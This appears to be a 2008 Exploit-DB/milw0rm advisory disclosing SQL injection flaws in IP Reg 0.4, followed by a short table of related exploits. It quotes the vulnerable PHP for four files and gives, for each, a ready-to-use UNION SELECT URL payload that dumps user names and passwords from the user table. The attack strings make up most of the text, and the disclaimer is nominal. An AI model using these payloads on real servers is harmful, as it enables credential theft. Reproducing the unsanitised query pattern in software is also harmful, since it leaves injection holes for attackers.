# IP Reg <= 0.4 Multiple Remote SQL Injection Vulnerabilities # url: http://sourceforge.net/projects/ipreg/ # # Author: JosS # mail: sys-project[at]hotmail[dot]com # site: http://spanish-hackers.com # team: Spanish Hackers Team - [SHT] # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # # Greetz To: All Hackers and milw0rm website ------------------------- vuln file: /locationdel.php vuln code: 27: $location_id = $_GET['location_id']; xx: ... 42: $result = mysql_query("SELECT location_name FROM location WHERE location_id='$location_id'") or die(mysql_error()); PoC: /locationdel.php?location_id='[foo] Exploit: /locationdel.php?location_id='+union+all+select+concat(user_name,char(58),user_pass)+from+user/* ------------------------- vuln file: /vlanview.php vuln code: 27: $vlan_id = $_GET['vlan_id']; xx: ... 42: $result = mysql_query("SELECT vlan_name, vlan_number, vlan_info FROM vlan WHERE vlan_id='$vlan_id'") or die(mysql_error ()); PoC: /vlanview.php?vlan_id='[foo] Exploit: /vlanview.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/* ------------------------- vuln file: /vlanedit.php vuln code: 27: $vlan_id = $_GET['vlan_id']; xx: ... 42: $result = mysql_query("SELECT vlan_name, vlan_number, vlan_info FROM vlan WHERE vlan_id='$vlan_id'") or die(mysql_error ()); PoC: /vlanedit.php?vlan_id='[foo] Exploit: /vlanedit.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/* ------------------------- vuln file: /vlandel.php vuln code: 27: $vlan_id = $_GET['vlan_id']; xx: ... 42: $result = mysql_query("SELECT vlan_id, vlan_name, vlan_number FROM vlan WHERE vlan_id='$vlan_id'") or die(mysql_error ()); PoC: /vlandel.php?vlan_id='[foo] Exploit: /vlandel.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/* # milw0rm.com [2008-10-16]
Related Exploits
Trying to match CVEs (1): CVE-2008-4606Trying to match OSVDBs (2): 49231, 49232
Trying to match setup file: cbd7c532b6e1708ac1cdf7df43de57ca
Other Possible E-DB Search Terms: IP Reg 0.4, IP Reg
Date | D | V | Title | Author |
---|---|---|---|---|
2007-12-22 |
![]() |
IP Reg 0.3 - Multiple SQL Injections | MhZ91 | |
2008-10-03 |
![]() |
IP Reg 0.4 - Blind SQL Injection | StAkeR |